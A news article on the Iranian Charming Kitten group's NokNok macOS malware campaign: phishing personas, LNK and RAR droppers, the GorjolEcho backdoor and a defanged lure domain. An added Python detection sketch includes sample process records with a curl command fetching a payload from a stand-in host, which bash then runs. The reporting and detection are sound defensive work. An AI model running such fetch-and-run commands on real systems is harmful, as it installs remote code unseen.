Posted on July 10, 2023 at 6:45 PM
Charming Kitten Hackers Deploy A New NokNok Malware Targeting macOS Devices
Cybersecurity researchers have detected a new hacking campaign that is being attributed to the Charming Kitten APT group. During this campaign, the hackers deploy a new NokNok malware that is used to target macOS systems.
Charming Kitten’s hackers deploy a new NokNok malware
The hacking campaign in question started in May, and it relies on an infection chain that differs from the one detected previously. LNK files are used to deploy the payloads instead of the Word documents that the group usually loads with malware. Past attacks attributed to this group typically involved malware embedded in Word documents.
Charming Kitten is a hacker group that is also known by other names, such as APT42 or Phosphorus. The group has been linked to at least 30 operations across 14 countries since it started conducting hacking campaigns in 2015, according to a report by Mandiant.
Google has associated the threat actor with the Iranian government and the Islamic Revolutionary Guard Corps (IRGC). The state-sponsored hacker group has been linked to a wide range of hacking campaigns in the past targeting governments and key institutions.
In September last year, the US government reported that it had identified and charged the members of this hacker group. Despite the charges, the hackers have continued to wreak havoc.
A report by Proofpoint said that the threat actor has now abandoned macro-based infection techniques built on malware-laden Word documents. Instead, the hacker group deploys LNK files to load the payloads.
The campaign relies on the social engineering and phishing strategies that have been observed throughout this operation. The hackers tricked the intended targets into believing they were corresponding with nuclear experts based in the US, and later approached these targets with offers to review drafts on foreign policy.
In most of these cases, the hackers bring other personas into the conversation to lend it a sense of legitimacy. The move also allows the hackers to build rapport with the intended target.
Charming Kitten usually depends on impersonation and assumed fake personas to launch its hacking campaigns. The hackers also rely on “sock puppets” to generate realistic conversation threads with the targets before launching the attack.
Hacking exploits on macOS devices
After the Charming Kitten hacker group has gained the interest of the target, it sends a malicious link. The link contains a Google Script macro that redirects the victim to a Dropbox URL.
The external source usually hosts a password-protected RAR archive. This archive contains a PowerShell-based malware dropper, along with an LNK file that stages the malware from a cloud hosting provider.
The final payload used to run these hacking exploits is known as GorjolEcho. The latter is a simple backdoor that is used to accept and execute commands from remote operators. To ensure that the activities of the hacker group are not detected, GorjolEcho will create a PDF that contains previous conversations between the hackers and the intended victims.
If the victim relies on macOS, the hackers realize it after failing to trigger an infection with the Windows payload. The hackers then send a link to “library-store[.]camdvr[.]org” that contains a ZIP file disguised as a Royal United Services Institute (RUSI) VPN application.
After an AppleScript file in the archive has been executed, a curl command retrieves the NokNok payload and creates a backdoor within the victim’s system. The NokNok backdoor generates a system identifier and then deploys four bash script modules to establish persistence, communicate with the command and control server, and exfiltrate data.
The NokNok malware also collects system information, including the OS version the target device is running, the running processes, and the applications that have been installed. The malware encrypts the gathered data and encodes it in base64 before exfiltrating it.
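As an added illustration of how a defender might spot the macOS chain described above (an AppleScript run through osascript, curl fetching the payload, a bash module executing it), here is a small detection routine over constructed EDR-style process records. It is not code from the article or from Proofpoint, and the process names, file paths and payload host are assumed placeholders.

```python
"""Detection sketch (added example, not from the article or Proofpoint): flag the
chain where a script run by osascript spawns curl to fetch a file a shell then runs."""

# Constructed sample process events; pids, paths and the payload host are placeholders.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1,   "image": "launchd",   "cmdline": "/sbin/launchd"},
    {"pid": 210, "ppid": 100, "image": "Finder",    "cmdline": "/System/Library/CoreServices/Finder.app/Contents/MacOS/Finder"},
    {"pid": 320, "ppid": 210, "image": "osascript", "cmdline": "osascript /Users/victim/Downloads/RUSI_VPN/vpn.scpt"},
    {"pid": 330, "ppid": 320, "image": "curl",      "cmdline": "curl -s -o /tmp/.nn https://payload.example.invalid/nn"},
    {"pid": 340, "ppid": 320, "image": "bash",      "cmdline": "bash /tmp/.nn"},
    {"pid": 400, "ppid": 100, "image": "Terminal",  "cmdline": "Terminal"},
    {"pid": 410, "ppid": 400, "image": "bash",      "cmdline": "bash -l"},
    {"pid": 420, "ppid": 410, "image": "curl",      "cmdline": "curl -s -o /tmp/notes.txt https://example.com/notes"},
]

def ancestors(pid, parent_of, image_of):
    """Yield the image names of every process above pid, nearest parent first."""
    seen = set()
    while pid in parent_of and pid not in seen:
        seen.add(pid)
        pid = parent_of[pid]
        if pid in image_of:
            yield image_of[pid]

def curl_output_path(cmdline):
    """Return the file curl was told to write with -o/--output, or None."""
    toks = cmdline.split()
    for i, tok in enumerate(toks[:-1]):
        if tok in ("-o", "--output"):
            return toks[i + 1]
    return None

def detect_script_fetch_and_run(events):
    """Alert on curl started under osascript; note whether a shell later ran the file."""
    parent_of = {e["pid"]: e["ppid"] for e in events}
    image_of = {e["pid"]: e["image"] for e in events}
    alerts = []
    for e in events:
        if e["image"] != "curl":
            continue
        if "osascript" not in ancestors(e["pid"], parent_of, image_of):
            continue  # benign: an interactive curl from a Terminal shell is skipped
        path = curl_output_path(e["cmdline"])
        executed = bool(path) and any(
            o["image"] in {"bash", "sh", "zsh"} and path in o["cmdline"].split() for o in events
        )
        alerts.append({"curl_pid": e["pid"], "payload": path, "executed": executed})
    return alerts
```

Running `detect_script_fetch_and_run(SAMPLE_EVENTS)` flags only the curl under osascript (pid 330) and records that bash executed the fetched file, while the curl from an interactive Terminal shell is left alone.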
The Proofpoint research has also said that the NokNok backdoor might be used to facilitate espionage campaigns through other modules. The suspicion is based on similarities between its code and GhostEcho.
GhostEcho can also capture screenshots, execute commands, and clean up its infection trail, and NokNok appears to contain the same functions. The entire campaign shows that Charming Kitten is highly adaptable and can target macOS systems if need be. It also shows that the threat from hacking campaigns using both old and new techniques is increasing.